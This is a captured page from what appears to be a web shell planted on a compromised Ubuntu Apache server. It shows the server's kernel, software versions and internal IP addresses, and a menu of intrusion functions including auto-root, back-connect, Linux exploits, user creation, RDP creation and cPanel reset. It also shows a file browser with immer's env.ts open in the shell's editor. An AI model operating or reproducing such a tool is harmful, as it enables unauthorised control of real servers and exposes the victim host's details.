Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
immer /
src /
utils /
[ HOME SHELL ]
Name
Size
Permission
Action
common.ts
5.93
KB
-rw-rw-r--
env.ts
1.56
KB
-rw-rw-r--
errors.ts
2.42
KB
-rw-rw-r--
plugins.ts
2.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : env.ts
// Should be no imports here! // Some things that should be evaluated before all else... // We only want to know if non-polyfilled symbols are available const hasSymbol = typeof Symbol !== "undefined" && typeof Symbol("x") === "symbol" export const hasMap = typeof Map !== "undefined" export const hasSet = typeof Set !== "undefined" export const hasProxies = typeof Proxy !== "undefined" && typeof Proxy.revocable !== "undefined" && typeof Reflect !== "undefined" /** * The sentinel value returned by producers to replace the draft with undefined. */ export const NOTHING: Nothing = hasSymbol ? Symbol.for("immer-nothing") : ({["immer-nothing"]: true} as any) /** * To let Immer treat your class instances as plain immutable objects * (albeit with a custom prototype), you must define either an instance property * or a static property on each of your custom classes. * * Otherwise, your class instance will never be drafted, which means it won't be * safe to mutate in a produce callback. */ export const DRAFTABLE: unique symbol = hasSymbol ? Symbol.for("immer-draftable") : ("__$immer_draftable" as any) export const DRAFT_STATE: unique symbol = hasSymbol ? Symbol.for("immer-state") : ("__$immer_state" as any) // Even a polyfilled Symbol might provide Symbol.iterator export const iteratorSymbol: typeof Symbol.iterator = (typeof Symbol != "undefined" && Symbol.iterator) || ("@@iterator" as any) /** Use a class type for `nothing` so its type is unique */ export class Nothing { // This lets us do `Exclude<T, Nothing>` // @ts-ignore private _!: unique symbol }
Close